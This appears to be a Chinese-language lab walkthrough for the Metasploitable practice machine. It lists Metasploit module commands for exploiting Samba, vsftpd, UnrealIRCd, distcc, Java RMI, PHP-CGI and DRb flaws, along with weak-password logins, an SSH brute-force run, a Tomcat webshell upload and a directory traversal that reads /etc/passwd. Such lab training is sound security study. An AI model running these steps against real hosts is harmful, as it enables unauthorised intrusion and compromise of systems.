首先输入用户名和密码进入靶机系统:msfadmin msfadmin
查询靶机IP:ifconfig ==192.168.1.113
MySQL弱口令:
mysql -h 192.168.1.113 -u root
成功进入MySQL数据库。
VNC弱口令:
vncviewer 192.168.1.113 输入密码:password 成功进入
Samba MS-RPC Shell 注入漏洞:
安全组织索引
CVE:CVE-2007-2447
BID:BID-23972
OSVDB:OSVDB-34700
原理:
Samba 中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。
如果在调用 smb.conf 中定义的外部脚本时,通过对 /bin/sh 的 MS-RPC 调用提交了恶意输入的话,就可能允许攻击者以nobody用户权限执行任意命令。
利用步骤:
- 启动metasploit
- use exploit/multi/samba/usermap_script ,选择漏洞
- set RHOST IP ,设置目标主机IP
- exploit 开始攻击
- 利用成功,用uname -a 验证
Vsftpd源码包后门漏洞
安全组织索引
BID-48539
OSVDB-73573
原理:
在特定版本的vsftpd服务器中,被人恶意植入代码,当用户名以”:)”为结尾,服务器就会在6200端口监听,并且能够执行任意代码。
利用步骤:
- 启动metasploit
- use exploit/unix/ftp/vsftpd_234_backdoor ,选择漏洞
- set RHOST IP ,设置目标主机IP
- expliot 开始攻击
- uname -a 验证
UnrealIRCd后门漏洞
安全组织索引
CVE-2010-2075
BID-40820
OSVDB-65445
原理:
在2009年11月到2010年6月间,分布于某些镜面站点的UnrealIRCd,
在DEBUG3_DOLOG_SYSTEM宏中包含外部引入的恶意代码,远程攻击者能够执行任意代码。
利用步骤:
- 启动metasploit
- use exploit/unix/irc/unreal_ircd_3281_backdoor
- set RHOST IP
- exploit
- uname -a
Java RMI SERVER 命令执行漏洞
安全组织索引
OSVDB-17535
原理:
Java RMI SERVER 的 RMI 注册表和 RMI 激活服务的默认配置存在安全漏洞,导致代码执行。
利用步骤:
- nmap -p0-65535 IP ,查看1099端口是否开启
- use exploit/multi/misc/java_rmi_server
- set RHOST IP
- exploit
- shell(进入meterpreter 时执行)
Tomcat管理台默认口令漏洞
- 访问IP:8081找到管理后台,用tomcat/tomcat登录
- 用jar-cvf将jsp webshell打包为*.war
- 通过tomcat管理台的deploy刚才打包的*.war
- 访问webshell
root用户弱口令(SSH爆破)
- nmap -sV -O IP ,查看SSH端口是否打开
- 启动metasploit
- use auxiliary/scanner/ssh/ssh_login
- set RHOST IP
- set USERNAME root
- set PASS_FILE /tmp/r00t/pass.txt(字典文件,预先备好)
- set THREADS 50
- run
- ssh root@IP 登录
Distcc后门漏洞
安全组织索引
CVE-2004-2678
OSVDB-13378
原理:
Distcc用于大量代码在网络服务器上的分布式编译,但是如果配置不严格,容易被滥用执行命令,
该漏洞是Xcode 1.5版本及其他版本的 distcc 2.x版本配置对于服务器端口的访问不限制
利用步骤:
- 启动metasploit
- use exploit/unix/misc/distcc_exec
- set RHOST IP
- exploit
- id 查看权限 uname -a 验证
Samba sysmlink 默认配置目录遍历漏洞
安全组织索引
CVE-2010-0926
BID-33598
OSVDB-62145
原理:
Samba 是一套实现SMB(server message block)协议,跨平台进行文件共享和打印共享服务的程序
samba的sambd默认配置在可写文件共享时,存在目录遍历漏洞,远程用户可以通过smbclient端使用一个对称名,
创建一个包含..的目录遍历符的软连接,可以进行目录遍历及访问任意文件
利用步骤:
- 启动metasploit
- use auxiliary/admin/smb/samba_sysmlink_traversal
- set RHOST IP
- set SMBSHARE tmp 设置SAM可写文件
- exploit
- smbclient//IP/tmp 在新窗口下打开上面生成的共享目录
- cd rootfs
- ls
- more /etc/passwd
PHP CGI 参数注入执行漏洞
安全组织索引
CVE-2012-1823
OSVDB-81633
原理:
CGI脚本没有正确处理请求参数,导致源代码泄露,允许远程攻击者在请求参数中插入执行命令。
利用步骤:
- 启动metasploit
- use exploit/multi/http/php_cgi_arg_injection
- set RHOST IP
- exploit
- ls 查看
Druby 远程代码执行漏洞
原理:
Druby配置不当,被滥用执行命令
利用步骤:
- nmap -p0-65535 -sS -sV IP 或者 nmap -bqv IP
- 启动metasploit
- 发现8787 Druby端口
- search drb 搜索drb相关漏洞
- use exploit/linux/misc/drb_remote_codeexec
- set URL druby:IP:8787 ,设置目标druby链接
- exploit
- id,uname -a